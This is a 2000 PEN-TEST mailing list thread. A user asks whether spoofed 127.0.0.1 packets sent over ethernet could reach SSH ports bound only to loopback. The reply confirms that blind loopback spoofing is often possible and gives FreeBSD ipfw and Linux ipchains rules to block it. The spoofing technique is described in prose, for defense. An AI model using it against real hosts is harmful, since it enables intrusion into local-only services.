Penetration Testing mailing list archives

Re: [PEN-TEST] Breaking SSH Listening Ports

From: "Dunker, Noah" <NDunker () FISHNETSECURITY COM>
Date: Thu, 14 Sep 2000 15:02:52 -0500

This method of spoofing was actually pretty common a while back ago...  YES,
on most OS's, you can inject loopback traffic on a PPP or ethernet
interface, and YES, it will usually read the traffic.  This is going to be a
blind spoof, and nothing will get sent back to you.  If you have something
bound to listen only on 127.0.0.1, it may prevent this from working,
depending on how it's using the interface.  if it's actually using the
interface, not the IP address, the traffic might not get to the listening
application.  If it is listening only for something going to that address,
then it will see the traffic no matter what.  This is why I do some fun
firewalling rules with IPCHAINS and IPFilter on my unix-ish machines:

Both of these methods use kernel-level packet filters to accept
localhost-subnet ONLY over the genuine loopback interface.

(FreeBSD)
ipfw add 1 pass ip from 127.0.0.0/8 in via lo0
ipfw add 2 deny ip from 127.0.0.0/8


or Linux 2.2.x, IPChains:
ipchains -A input -p tcp -s 0/0 -d 127.0.0.0/8 -i !lo -j REJECT

I don't have extensive experience with the Windows (9x/nt) TCP/IP stack, so
I don't know what tools out there can do something similar, of if they
exist.

--Noah Dunker



-----Original Message-----
From: MARC A KURTZ [mailto:marck () ESU EDU]
Sent: Thursday, September 14, 2000 2:03 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Breaking SSH Listening Ports


(I hope this isn't off-topic)

We are looking into way to break a solution we have that uses SSH to forward
local ports on a Windows box. It uses the option to only bind to 127.0.0.1

My question is, is a hacker able to "break" into the computer and send data
to that loopback address and get the response? Is the loopback completely
non-physical? In other words if a hacker injected 127.0.0.1 packets into the
ethernet card somehow, would the card ignore them, or pass them to the IP
stack?? Will the hacker be able to get the response if it gave one? We are
also assuming there is no PcAnywhere or similiar software installed to take
control of the mouse, keyboard and screen.

Thanks for any insight anyone can give me!

Thank you,
Marc Kurtz

Current thread:

[PEN-TEST] Breaking SSH Listening Ports MARC A KURTZ (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Jose Nazario (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Crist Clark (Sep 14)
- <Possible follow-ups>
- Re: [PEN-TEST] Breaking SSH Listening Ports Dunker, Noah (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Dunker, Noah (Sep 14)